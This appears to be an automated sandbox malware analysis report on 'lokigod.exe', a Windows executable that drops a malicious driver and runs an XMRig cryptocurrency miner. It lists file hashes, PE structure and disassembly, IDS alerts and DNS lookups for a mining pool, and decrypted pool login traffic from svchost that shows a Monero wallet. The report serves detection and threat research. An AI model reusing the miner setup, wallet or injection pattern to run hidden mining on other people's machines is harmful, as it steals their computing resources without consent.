                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Windows\Temp\__PSScriptPolicyTest_mo0p0iqd.0en.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Windows\Temp\__PSScriptPolicyTest_vcrmti4b.z1r.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Windows\Temp\__PSScriptPolicyTest_yrxqixcm.jnz.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Windows\Temp\gdtmkvyhysuy.sys

                                      Download File
                                      Process:C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe
                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):14544
                                      Entropy (8bit):6.2660301556221185
                                      Encrypted:false
                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 5%
                                      Joe Sandbox View:
                                      • Filename: nfkciRoR4j.exe, Detection: malicious, Browse
                                      • Filename: File.exe, Detection: malicious, Browse
                                      • Filename: rLaC8kO1rD.exe, Detection: malicious, Browse
                                      • Filename: newtpp.exe, Detection: malicious, Browse
                                      • Filename: main.exe, Detection: malicious, Browse
                                      • Filename: 6xQ8CMUaES.exe, Detection: malicious, Browse
                                      • Filename: 4o8Tgrb384.exe, Detection: malicious, Browse
                                      • Filename: 0kToM9fVGQ.exe, Detection: malicious, Browse
                                      • Filename: m2.exe, Detection: malicious, Browse
                                      • Filename: ICBM-noml.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Entropy (8bit):6.532806304390814
                                      TrID:
                                      • Win64 Executable GUI (202006/5) 92.65%
                                      • Win64 Executable (generic) (12005/4) 5.51%
                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                      • DOS Executable Generic (2002/1) 0.92%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:lokigod.exe
                                      File size:5'265'920 bytes
                                      MD5:769ea3d0e0cf22eaa7526a89c0f438cf
                                      SHA1:5221042ad60744e2bdcf8319ff00bdbfc253eb59
                                      SHA256:b369c94a835882a2267ff0a7a4ebb9a91621c3f134f63010d491121a7827b448
                                      SHA512:d50130430911f16f4d2f7e4d3552f51ceb74601eda13cfbc374c9327e11d7865bdfc49803b54cf7b595b89996db28d3173d7a22993e968fd9a1a080c6b434c9a
                                      SSDEEP:98304:CZtFWHS5GGYCdrURVNMjxcJMWQEiNXiRr5k6bbm9dz6O/9Py4TZBZhdy2ZhoS:C0HS8dCjmMWQEBRr5kE4/lPy4zZPyqhT
                                      TLSH:5D3623BCA9BF4D3ED4490033FEADD345B9264539874027098ABF44E5AAA05F8177CEC9
                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...}.Kg.........."...........O.....@..........@..............................P...........`........................................

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x140001140
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x140000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x674B187D [Sat Nov 30 13:51:57 2024 UTC]
                                      TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:3b819c3dfb34bc24b00db0746b529d11

                                      Entrypoint Preview

                                      Instruction
                                      dec eax
                                      sub esp, 28h
                                      dec eax
                                      mov eax, dword ptr [0000BED5h]
                                      mov dword ptr [eax], 00000001h
                                      call 00007F17551A370Fh
                                      nop
                                      nop
                                      nop
                                      dec eax
                                      add esp, 28h
                                      ret
                                      nop
                                      inc ecx
                                      push edi
                                      inc ecx
                                      push esi
                                      push esi
                                      push edi
                                      push ebx
                                      dec eax
                                      sub esp, 20h
                                      dec eax
                                      mov eax, dword ptr [00000030h]
                                      dec eax
                                      mov edi, dword ptr [eax+08h]
                                      dec eax
                                      mov esi, dword ptr [0000BEC9h]
                                      xor eax, eax
                                      dec eax
                                      cmpxchg dword ptr [esi], edi
                                      sete bl
                                      je 00007F17551A3730h
                                      dec eax
                                      cmp edi, eax
                                      je 00007F17551A372Bh
                                      dec esp
                                      mov esi, dword ptr [0000F769h]
                                      nop word ptr [eax+eax+00000000h]
                                      mov ecx, 000003E8h
                                      inc ecx
                                      call esi
                                      xor eax, eax
                                      dec eax
                                      cmpxchg dword ptr [esi], edi
                                      sete bl
                                      je 00007F17551A3707h
                                      dec eax
                                      cmp edi, eax
                                      jne 00007F17551A36E9h
                                      dec eax
                                      mov edi, dword ptr [0000BE90h]
                                      mov eax, dword ptr [edi]
                                      cmp eax, 01h
                                      jne 00007F17551A370Eh
                                      mov ecx, 0000001Fh
                                      call 00007F17551AE494h
                                      jmp 00007F17551A3729h
                                      cmp dword ptr [edi], 00000000h
                                      je 00007F17551A370Bh
                                      mov byte ptr [00505A81h], 00000001h
                                      jmp 00007F17551A371Bh
                                      mov dword ptr [edi], 00000001h
                                      dec eax
                                      mov ecx, dword ptr [0000BE7Ah]
                                      dec eax
                                      mov edx, dword ptr [0000BE7Bh]
                                      call 00007F17551AE48Bh
                                      mov eax, dword ptr [edi]
                                      cmp eax, 01h
                                      jne 00007F17551A371Bh
                                      dec eax
                                      mov ecx, dword ptr [0000BE50h]

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x105f80x3c.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x50a0000x1a4.pdata
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x50d0000x78.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0xd0a00x28.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xd4100x138.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x107b00x178.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000xb1160xb200e2c882a8b1fc9c281cfd95fcfc111d33False0.47934954353932585data6.157073251509243IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0xd0000x3dec0x3e00da21ae6d5cfabae6999c08804fe14dc7False0.5170110887096774data4.846372622893658IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x110000x4f8bd80x4f5e004e3eeeaede1374b23a44abee51866339unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .pdata0x50a0000x1a40x200595d2386378e684c41a7598fc6141c3bFalse0.53515625data3.681837602251576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .00cfg0x50b0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .tls0x50c0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .reloc0x50d0000x780x200d354ce822692a4974e48c35143fe8dbeFalse0.232421875data1.4571730891632382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Imports

                                      DLLImport
                                      msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _time64, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, rand, signal, srand, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                      KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-04T17:05:08.732115+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.5511721.1.1.153UDP
                                      2024-12-04T17:05:09.724782+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.5511721.1.1.153UDP
                                      2024-12-04T17:05:12.220760+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.54970437.203.243.102443TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 4, 2024 17:05:09.784760952 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:05:09.784804106 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:05:09.784882069 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:05:09.785099983 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:05:09.785115004 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:05:12.216128111 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:05:12.217545033 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:05:12.217562914 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:05:12.219012976 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:05:12.219178915 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:05:12.220556021 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:05:12.220627069 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:05:12.271626949 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:05:12.271641016 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:05:12.318494081 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:05:13.487190008 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:05:13.537209034 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:05:16.778167009 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:05:16.818579912 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:05:37.819400072 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:05:37.865582943 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:05:59.912735939 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:05:59.959477901 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:06:01.269285917 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:06:01.318892956 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:06:21.984054089 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:06:22.037717104 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:06:44.522547960 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:06:44.569199085 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:07:01.276937962 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:07:01.319281101 CET49704443192.168.2.537.203.243.102
                                      Dec 4, 2024 17:07:06.470835924 CET4434970437.203.243.102192.168.2.5
                                      Dec 4, 2024 17:07:06.522424936 CET49704443192.168.2.537.203.243.102

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 4, 2024 17:05:08.732115030 CET5117253192.168.2.51.1.1.1
                                      Dec 4, 2024 17:05:09.724781990 CET5117253192.168.2.51.1.1.1
                                      Dec 4, 2024 17:05:09.762593031 CET53511721.1.1.1192.168.2.5
                                      Dec 4, 2024 17:05:10.166341066 CET53511721.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 4, 2024 17:05:08.732115030 CET192.168.2.51.1.1.10x1d0eStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                      Dec 4, 2024 17:05:09.724781990 CET192.168.2.51.1.1.10x1d0eStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 4, 2024 17:05:09.762593031 CET1.1.1.1192.168.2.50x1d0eNo error (0)pool.hashvault.pro37.203.243.102A (IP address)IN (0x0001)false
                                      Dec 4, 2024 17:05:09.762593031 CET1.1.1.1192.168.2.50x1d0eNo error (0)pool.hashvault.pro5.188.137.200A (IP address)IN (0x0001)false
                                      Dec 4, 2024 17:05:10.166341066 CET1.1.1.1192.168.2.50x1d0eNo error (0)pool.hashvault.pro37.203.243.102A (IP address)IN (0x0001)false
                                      Dec 4, 2024 17:05:10.166341066 CET1.1.1.1192.168.2.50x1d0eNo error (0)pool.hashvault.pro5.188.137.200A (IP address)IN (0x0001)false
                                      Dec 4, 2024 17:05:16.703939915 CET1.1.1.1192.168.2.50x2e22No error (0)windowsupdatebg.s.llnwi.net178.79.238.0A (IP address)IN (0x0001)false

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.54970437.203.243.1024437636C:\Windows\System32\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-04 16:05:12 UTC601OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 38 42 38 70 6e 56 79 53 7a 6a 6f 68 57 4b 75 55 6e 58 37 70 50 54 4b 4d 51 57 58 59 67 47 57 72 35 31 7a 5a 46 64 45 35 77 66 67 44 47 79 76 39 78 48 4c 76 6b 58 41 68 73 5a 61 37 72 53 68 6d 44 38 50 75 32 76 6e 79 39 48 72 70 42 43 71 66 55 66 45 31 69 5a 35 42 43 5a 76 7a 68 66 7a 22 2c 22 70 61 73 73 22 3a 22 36 32 33 38 31 31 30 36 35 39 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72
                                      Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"8B8pnVySzjohWKuUnX7pPTKMQWXYgGWr51zZFdE5wfgDGyv9xHLvkXAhsZa7rShmD8Pu2vny9HrpBCqfUfE1iZ5BCZvzhfz","pass":"6238110659","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","r
                                      2024-12-04 16:05:13 UTC732INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 32 35 64 63 32 34 66 61 2d 62 64 35 37 2d 34 36 37 62 2d 61 39 34 35 2d 35 37 31 32 36 38 31 63 66 30 39 63 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 37 66 62 63 31 62 61 30 36 62 66 32 37 35 64 32 61 30 64 63 34 39 30 35 63 34 36 37 39 38 34 38 34 66 63 61 38 32 64 35 39 35 63 38 30 37 33 33 38 36 37 66 66 65 32 64 33 66 39 61 31 64 63 31 36 63 38 30 63 30 34 35 33 30 30 30 30 30 30 30 30 63 33 65 37 35 65 63 30 38 32 64 62 32 36 38 62 32 30 62 31 33 66 36 31 31 63 36 32 66 31 63 35 38 38 62 32 63 31 63 33 37 63 62 39 61 35 34 64 34 32 39 64 30 33 31 32 61 31 35 31 32 35 30
                                      Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"25dc24fa-bd57-467b-a945-5712681cf09c","job":{"blob":"1010b7fbc1ba06bf275d2a0dc4905c46798484fca82d595c80733867ffe2d3f9a1dc16c80c045300000000c3e75ec082db268b20b13f611c62f1c588b2c1c37cb9a54d429d0312a151250
                                      2024-12-04 16:05:16 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 62 66 62 63 31 62 61 30 36 66 63 65 39 64 63 36 65 30 36 38 62 34 63 66 30 66 66 61 37 64 33 66 31 31 30 37 66 36 39 66 35 65 30 63 36 37 61 31 34 63 39 32 31 33 64 35 33 33 66 63 34 64 64 33 63 36 39 31 32 63 38 36 38 30 30 30 30 30 30 30 30 62 37 30 31 37 61 66 63 32 65 32 64 36 63 30 32 62 65 37 66 39 62 35 64 35 62 31 37 31 35 30 31 62 61 35 62 32 36 32 33 37 34 62 62 39 62 36 31 61 35 37 31 30 62 39 38 30 34 62 34 65 64 31 65 30 34 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 63 31 32 37 31 61 38 34 2d 36 35 62 61 2d 34 31 61 64 2d 61 37 32 64 2d 62 35 61 39 35 64 32 30 31 63 38 36 22 2c 22 74 61
                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bbfbc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c86800000000b7017afc2e2d6c02be7f9b5d5b171501ba5b262374bb9b61a5710b9804b4ed1e04","job_id":"c1271a84-65ba-41ad-a72d-b5a95d201c86","ta
                                      2024-12-04 16:05:37 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 31 66 62 63 31 62 61 30 36 66 63 65 39 64 63 36 65 30 36 38 62 34 63 66 30 66 66 61 37 64 33 66 31 31 30 37 66 36 39 66 35 65 30 63 36 37 61 31 34 63 39 32 31 33 64 35 33 33 66 63 34 64 64 33 63 36 39 31 32 63 38 36 38 30 30 30 30 30 30 30 30 62 34 37 33 32 63 39 32 61 37 33 30 34 39 36 33 63 33 30 30 39 61 35 33 37 64 61 36 64 66 36 38 33 36 61 31 34 34 36 63 30 64 65 61 66 62 38 37 61 38 35 30 30 64 36 62 32 64 62 34 61 64 32 35 30 37 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 31 61 39 34 61 30 38 30 2d 33 37 64 32 2d 34 65 32 38 2d 62 35 65 30 2d 64 36 62 66 66 39 63 33 66 39 39 39 22 2c 22 74 61
                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d1fbc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c86800000000b4732c92a7304963c3009a537da6df6836a1446c0deafb87a8500d6b2db4ad2507","job_id":"1a94a080-37d2-4e28-b5e0-d6bff9c3f999","ta
                                      2024-12-04 16:05:59 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 37 66 62 63 31 62 61 30 36 66 63 65 39 64 63 36 65 30 36 38 62 34 63 66 30 66 66 61 37 64 33 66 31 31 30 37 66 36 39 66 35 65 30 63 36 37 61 31 34 63 39 32 31 33 64 35 33 33 66 63 34 64 64 33 63 36 39 31 32 63 38 36 38 30 30 30 30 30 30 30 30 36 64 30 35 32 61 37 62 65 61 39 36 66 35 65 63 66 31 65 36 65 66 62 32 31 64 38 39 61 32 66 39 31 37 31 66 33 32 62 32 30 37 65 35 31 63 31 35 31 34 63 38 39 31 32 37 37 37 39 62 35 31 66 39 30 65 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 32 61 65 32 32 62 34 31 2d 33 61 64 30 2d 34 33 63 32 2d 38 33 66 64 2d 31 65 64 61 31 36 34 61 66 66 66 39 22 2c 22 74 61
                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e7fbc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c868000000006d052a7bea96f5ecf1e6efb21d89a2f9171f32b207e51c1514c89127779b51f90e","job_id":"2ae22b41-3ad0-43c2-83fd-1eda164afff9","ta
                                      2024-12-04 16:06:01 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 37 66 62 63 31 62 61 30 36 66 63 65 39 64 63 36 65 30 36 38 62 34 63 66 30 66 66 61 37 64 33 66 31 31 30 37 66 36 39 66 35 65 30 63 36 37 61 31 34 63 39 32 31 33 64 35 33 33 66 63 34 64 64 33 63 36 39 31 32 63 38 36 38 30 30 30 30 30 30 30 30 37 61 36 33 64 61 61 30 35 39 65 37 63 63 31 61 62 65 36 30 35 65 64 35 65 30 38 63 66 61 35 33 66 38 61 65 36 33 38 65 63 32 30 64 35 37 39 65 66 31 66 66 64 36 61 31 39 32 66 31 62 66 63 39 30 65 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 32 32 36 32 63 33 32 35 2d 33 30 39 31 2d 34 61 37 32 2d 62 64 36 37 2d 35 66 36 63 30 39 39 32 30 64 35 65 22 2c 22 74 61
                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e7fbc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c868000000007a63daa059e7cc1abe605ed5e08cfa53f8ae638ec20d579ef1ffd6a192f1bfc90e","job_id":"2262c325-3091-4a72-bd67-5f6c09920d5e","ta
                                      2024-12-04 16:06:21 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 64 66 62 63 31 62 61 30 36 66 63 65 39 64 63 36 65 30 36 38 62 34 63 66 30 66 66 61 37 64 33 66 31 31 30 37 66 36 39 66 35 65 30 63 36 37 61 31 34 63 39 32 31 33 64 35 33 33 66 63 34 64 64 33 63 36 39 31 32 63 38 36 38 30 30 30 30 30 30 30 30 39 30 36 66 65 65 64 38 30 38 37 38 35 66 31 37 31 66 37 37 34 66 30 35 64 62 37 66 62 33 34 66 66 35 61 36 62 37 32 66 61 35 33 32 36 64 33 62 66 65 64 34 33 65 39 30 65 37 63 39 31 38 37 36 31 64 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 35 39 31 35 38 62 32 35 2d 36 65 38 32 2d 34 34 30 61 2d 62 63 36 36 2d 65 34 63 62 33 63 34 37 39 38 38 62 22 2c 22 74 61
                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fdfbc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c86800000000906feed808785f171f774f05db7fb34ff5a6b72fa5326d3bfed43e90e7c918761d","job_id":"59158b25-6e82-440a-bc66-e4cb3c47988b","ta
